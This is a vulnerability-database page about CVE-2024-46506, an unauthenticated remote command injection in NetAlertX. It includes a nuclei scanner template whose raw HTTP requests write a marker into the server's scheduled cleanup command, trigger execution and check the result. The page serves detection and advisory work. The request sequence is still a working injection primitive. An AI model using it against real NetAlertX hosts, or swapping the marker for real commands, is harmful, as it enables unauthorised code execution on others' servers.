Lucene search
+L

NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution

🗓️ 07 Sep 2026 06:34:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

NetAlertX before 24.10.12 has unauthenticated remote command injection (CVE-2024-46506) via settings.

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Missing Authentication for Critical Function in Netalertx
27 Dec 202522:07
githubexploit
bdu_fstec
BDU FSTEC
The vulnerability of the saveSettings() function in the settings.php script of the NetAlert X intrusion notification network infrastructure allows a intruder to execute arbitrary code.
11 Mar 202500:00
bdu_fstec
circl
Circl
CVE-2024-46506
30 Jan 202512:03
circl
cnnvd
CNNVD
NetAlertX 安全漏洞
13 May 202500:00
cnnvd
cnnvd
CNNVD
NetAlertX 安全漏洞
13 May 202500:00
cnnvd
cve
CVE
CVE-2024-46506
13 May 202500:00
cve
cvelist
Cvelist
CVE-2024-46506
13 May 202500:00
cvelist
kitploit
Kitploit
CVE-2024-46506
8 Sep 202622:09
kitploit
metasploit
Metasploit
Unauthenticated RCE in NetAlertX
30 Jan 202500:00
metasploit
nvd
NVD
CVE-2024-46506
13 May 202516:15
nvd
Rows per page
id: CVE-2024-46506

info:
  name: NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    NetAlertX 23.01.14 through 24.x before 24.10.12 allows unauthenticated command injection via settings update because function=savesettings lacks an authentication requirement, as exploited in the wild in May 2025. This is related to settings.php and util.php.
  impact: |
    Unauthenticated attackers can execute arbitrary commands on the NetAlertX server without authentication.
  remediation: |
    Update NetAlertX to version 24.10.12 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-46506
    cwe-id: CWE-306
    epss-score: 0.62045
    epss-percentile: 0.99119
    cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    fofa-query: title="netalertx"
    vendor: netalertx
    product: netalertx
  tags: cve,cve2024,netalertx,rce,intrusive,vkev,vuln

variables:
  marker: "{{to_lower(rand_base(6))}}"
  uuid: "{{to_lower(rand_base(8))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(12))}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /php/server/util.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=savesettings&settings=[["DBCLNP","DBCLNP_RUN","string","schedule"],["DBCLNP","DBCLNP_CMD","string","{{marker}}"],["DBCLNP","DBCLNP_RUN_SCHD","string","* * * * *"]]

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"OK")'
        condition: and
        internal: true

  - raw:
      - |
        POST /php/server/util.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=addToExecutionQueue&action={{uuid}}|cron_restart_backend

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"{{uuid}}","added to the execution queue")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/table_settings.json HTTP/1.1
        Host: {{Hostname}}

        {{wait_for(5)}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{marker}}")'
          - 'contains(content_type,"application/json")'
        condition: and
# digest: 4a0a00473045022031b2899f1f7236065dc7f55685fa5f3d5b48a50ca69b3ad9167397b66584dd45022100c50b77af877cebb44cd63a5d22daa1676635d187156bb1700a940e51473aa106:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.110
EPSS0.62045
SSVC
27